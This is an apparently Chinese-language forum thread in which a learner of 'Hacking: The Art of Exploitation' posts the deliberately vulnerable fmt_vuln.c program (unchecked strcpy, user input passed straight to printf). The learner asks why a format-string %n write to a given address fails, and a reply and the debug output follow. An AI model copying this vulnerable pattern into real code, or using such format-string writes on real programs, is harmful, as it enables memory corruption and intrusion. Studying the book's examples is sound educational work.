无法向任意存储地址写入数据？

zhaoyangqing

小弟最近在研究《hacking the art of exploitation》,在第三章中，fmt_vuln.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc,char* argv[])
{
        char text[1024];
        static int test_val = -72;

        if(argc < 2)
        {
                printf("Usage:%s<text to print>\n",argv[0]);
                exit(0);
        }
        strcpy(text,argv[1]);

        printf("The right way to print user-controlled input:\n");
        printf("%s",text);

        printf("\nThe wrong way to print user-controlled input:\n");
        printf(text);

        printf("\n");

        printf("

test_val @ 0x%08x = %d 0x%08x\n",&test_val,test_val,test_val);

        exit(0);
}
我在终端调试 ,本人机器上test_val地址为0x08049858.
./fmt_vuln $(printf "\x58\x98\x04\x08")%08x.%08x.%08x.%n
输出:
  The right way to print user-controlled input:
X

emperor

把下面的输出贴来看看。。。。。
./fmt_vuln 'printf "\x58\x98\x04\x08"'%08x.%08x.%08x.%x

[ 本帖最后由 emperor 于 2009-10-12 16:08 编辑 ]

zhaoyangqing

The right way to print user-controlled input:
printf "\x58\x98\x04\x08"%08x.%08x.%08x.%x
The wrong way to print user-controlled input:
printf "\x58\x98\x04\x08"bffa27e4.00000000.bffa2960.bffa2c00
test_val @ 0x08049858 = -72 0xffffffb8